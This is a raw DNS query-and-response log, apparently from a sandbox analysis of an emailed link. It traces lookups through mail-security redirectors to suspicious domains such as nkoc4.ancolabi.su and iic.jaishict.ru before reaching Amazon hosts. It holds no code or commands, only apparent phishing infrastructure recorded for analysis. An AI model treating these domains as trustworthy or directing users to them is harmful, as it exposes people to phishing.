                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:59.996779919 CEST192.168.2.41.1.1.10xe304Standard query (0)fls-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:59.996946096 CEST192.168.2.41.1.1.10xc964Standard query (0)fls-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:06.255506992 CEST192.168.2.41.1.1.10x72abStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:06.255669117 CEST192.168.2.41.1.1.10xfedaStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Aug 12, 2024 15:22:39.050288916 CEST1.1.1.1192.168.2.40x56d6No error (0)svc.ha-teams.office.comsvc.ms-acdc-teams.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:22:39.050288916 CEST1.1.1.1192.168.2.40x56d6No error (0)svc.ms-acdc-teams.office.com52.123.243.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:22:39.050288916 CEST1.1.1.1192.168.2.40x56d6No error (0)svc.ms-acdc-teams.office.com52.123.224.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:22:39.050288916 CEST1.1.1.1192.168.2.40x56d6No error (0)svc.ms-acdc-teams.office.com52.123.224.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:22:53.951538086 CEST1.1.1.1192.168.2.40x30aaNo error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.009919882 CEST1.1.1.1192.168.2.40x2bf3No error (0)redirect.aecdaily.comweb4.iemsi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.073162079 CEST1.1.1.1192.168.2.40x7593No error (0)redirect.aecdaily.comweb4.iemsi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.073162079 CEST1.1.1.1192.168.2.40x7593No error (0)web4.iemsi.com64.34.23.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.853712082 CEST1.1.1.1192.168.2.40x8c1bNo error (0)url.us.m.mimecastprotect.com207.211.31.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.853712082 CEST1.1.1.1192.168.2.40x8c1bNo error (0)url.us.m.mimecastprotect.com205.139.111.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.853712082 CEST1.1.1.1192.168.2.40x8c1bNo error (0)url.us.m.mimecastprotect.com207.211.31.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.853712082 CEST1.1.1.1192.168.2.40x8c1bNo error (0)url.us.m.mimecastprotect.com207.211.31.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.853712082 CEST1.1.1.1192.168.2.40x8c1bNo error (0)url.us.m.mimecastprotect.com205.139.111.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.853712082 CEST1.1.1.1192.168.2.40x8c1bNo error (0)url.us.m.mimecastprotect.com205.139.111.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:06.093789101 CEST1.1.1.1192.168.2.40x5f4dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:06.094290972 CEST1.1.1.1192.168.2.40xb261No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:06.809746981 CEST1.1.1.1192.168.2.40x61d0No error (0)url6.mailanyone.neturl6.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:07.297358036 CEST1.1.1.1192.168.2.40xabdfNo error (0)url6.mailanyone.neturl6.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:09.099519968 CEST1.1.1.1192.168.2.40x1f76No error (0)url6.mailanyone.neturl6.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:09.101155996 CEST1.1.1.1192.168.2.40xc400No error (0)url6.mailanyone.neturl6.mailanyone.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:17.145848989 CEST1.1.1.1192.168.2.40x14b7No error (0)specialpoint.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:17.145886898 CEST1.1.1.1192.168.2.40x5c9aNo error (0)specialpoint.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:17.145886898 CEST1.1.1.1192.168.2.40x5c9aNo error (0)specialpoint.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:18.226954937 CEST1.1.1.1192.168.2.40xa59aNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.129574060 CEST1.1.1.1192.168.2.40x873cNo error (0)nkoc4.ancolabi.su104.21.62.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.129574060 CEST1.1.1.1192.168.2.40x873cNo error (0)nkoc4.ancolabi.su172.67.139.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.177238941 CEST1.1.1.1192.168.2.40x2750No error (0)specialpoint.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.301403046 CEST1.1.1.1192.168.2.40x11e7No error (0)nkoc4.ancolabi.su65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.414294004 CEST1.1.1.1192.168.2.40x5c22No error (0)specialpoint.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.414294004 CEST1.1.1.1192.168.2.40x5c22No error (0)specialpoint.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:21.531502008 CEST1.1.1.1192.168.2.40xbb62No error (0)iic.jaishict.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:21.775271893 CEST1.1.1.1192.168.2.40x367bNo error (0)iic.jaishict.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:21.775271893 CEST1.1.1.1192.168.2.40x367bNo error (0)iic.jaishict.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.050581932 CEST1.1.1.1192.168.2.40xe6baNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.050581932 CEST1.1.1.1192.168.2.40xe6baNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.050581932 CEST1.1.1.1192.168.2.40xe6baNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.050581932 CEST1.1.1.1192.168.2.40xe6baNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.050581932 CEST1.1.1.1192.168.2.40xe6baNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.050581932 CEST1.1.1.1192.168.2.40xe6baNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.067210913 CEST1.1.1.1192.168.2.40xbcNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.067210913 CEST1.1.1.1192.168.2.40xbcNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.265932083 CEST1.1.1.1192.168.2.40xa4c8No error (0)iic.jaishict.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.265932083 CEST1.1.1.1192.168.2.40xa4c8No error (0)iic.jaishict.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.266340017 CEST1.1.1.1192.168.2.40xf2d6No error (0)iic.jaishict.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231453896 CEST1.1.1.1192.168.2.40x83a0No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231453896 CEST1.1.1.1192.168.2.40x83a0No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231453896 CEST1.1.1.1192.168.2.40x83a0No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231519938 CEST1.1.1.1192.168.2.40x45a9No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231519938 CEST1.1.1.1192.168.2.40x45a9No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231519938 CEST1.1.1.1192.168.2.40x45a9No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231551886 CEST1.1.1.1192.168.2.40xa4faNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231551886 CEST1.1.1.1192.168.2.40xa4faNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231551886 CEST1.1.1.1192.168.2.40xa4faNo error (0)c.media-amazon.com18.239.85.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.231672049 CEST1.1.1.1192.168.2.40x625aNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.235135078 CEST1.1.1.1192.168.2.40xc54aNo error (0)completion.amazon.com44.215.138.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.382972002 CEST1.1.1.1192.168.2.40x2c2bNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.382972002 CEST1.1.1.1192.168.2.40x2c2bNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.382972002 CEST1.1.1.1192.168.2.40x2c2bNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.382972002 CEST1.1.1.1192.168.2.40x2c2bNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.382972002 CEST1.1.1.1192.168.2.40x2c2bNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.382972002 CEST1.1.1.1192.168.2.40x2c2bNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.382972002 CEST1.1.1.1192.168.2.40x2c2bNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.383124113 CEST1.1.1.1192.168.2.40x5d8eNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.383124113 CEST1.1.1.1192.168.2.40x5d8eNo error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.383124113 CEST1.1.1.1192.168.2.40x5d8eNo error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.764502048 CEST1.1.1.1192.168.2.40x9e72No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.764502048 CEST1.1.1.1192.168.2.40x9e72No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.764502048 CEST1.1.1.1192.168.2.40x9e72No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.764502048 CEST1.1.1.1192.168.2.40x9e72No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.765403032 CEST1.1.1.1192.168.2.40xeabfNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.765403032 CEST1.1.1.1192.168.2.40xeabfNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.765403032 CEST1.1.1.1192.168.2.40xeabfNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.765403032 CEST1.1.1.1192.168.2.40xeabfNo error (0)c.media-amazon.com18.239.24.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110654116 CEST1.1.1.1192.168.2.40xcce2No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110654116 CEST1.1.1.1192.168.2.40xcce2No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110654116 CEST1.1.1.1192.168.2.40xcce2No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110654116 CEST1.1.1.1192.168.2.40xcce2No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110815048 CEST1.1.1.1192.168.2.40xb20dNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110815048 CEST1.1.1.1192.168.2.40xb20dNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110815048 CEST1.1.1.1192.168.2.40xb20dNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.110815048 CEST1.1.1.1192.168.2.40xb20dNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.143502951 CEST1.1.1.1192.168.2.40x9b6cNo error (0)unagi-eu.amazon.com67.220.224.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834947109 CEST1.1.1.1192.168.2.40x9b59No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834947109 CEST1.1.1.1192.168.2.40x9b59No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834947109 CEST1.1.1.1192.168.2.40x9b59No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834947109 CEST1.1.1.1192.168.2.40x9b59No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834947109 CEST1.1.1.1192.168.2.40x9b59No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834947109 CEST1.1.1.1192.168.2.40x9b59No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834947109 CEST1.1.1.1192.168.2.40x9b59No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834971905 CEST1.1.1.1192.168.2.40xc507No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834971905 CEST1.1.1.1192.168.2.40xc507No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.834971905 CEST1.1.1.1192.168.2.40xc507No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.192023039 CEST1.1.1.1192.168.2.40x97cfNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.192023039 CEST1.1.1.1192.168.2.40x97cfNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.194381952 CEST1.1.1.1192.168.2.40x77c9No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.194381952 CEST1.1.1.1192.168.2.40x77c9No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.194381952 CEST1.1.1.1192.168.2.40x77c9No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.194381952 CEST1.1.1.1192.168.2.40x77c9No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.194381952 CEST1.1.1.1192.168.2.40x77c9No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.194381952 CEST1.1.1.1192.168.2.40x77c9No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.212.43.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.154.24.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.72.181.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.31.90.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com99.80.93.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com63.34.40.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.214.71.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.897810936 CEST1.1.1.1192.168.2.40xce03No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.18.19.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.898596048 CEST1.1.1.1192.168.2.40x1aa4No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.898596048 CEST1.1.1.1192.168.2.40x1aa4No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.898596048 CEST1.1.1.1192.168.2.40x1aa4No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.010442972 CEST1.1.1.1192.168.2.40xaa19No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.010442972 CEST1.1.1.1192.168.2.40xaa19No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.010442972 CEST1.1.1.1192.168.2.40xaa19No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.230.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.78.35.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com63.33.185.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.75.1.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.106.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.50.183.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.182.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.031183004 CEST1.1.1.1192.168.2.40xe021No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.66.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.946449995 CEST1.1.1.1192.168.2.40x613cNo error (0)completion.amazon.aecompletion.amazon.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.950026989 CEST1.1.1.1192.168.2.40x5276No error (0)completion.amazon.aecompletion.amazon.co.ukCNAME (Canonical name)IN (0x0001)false
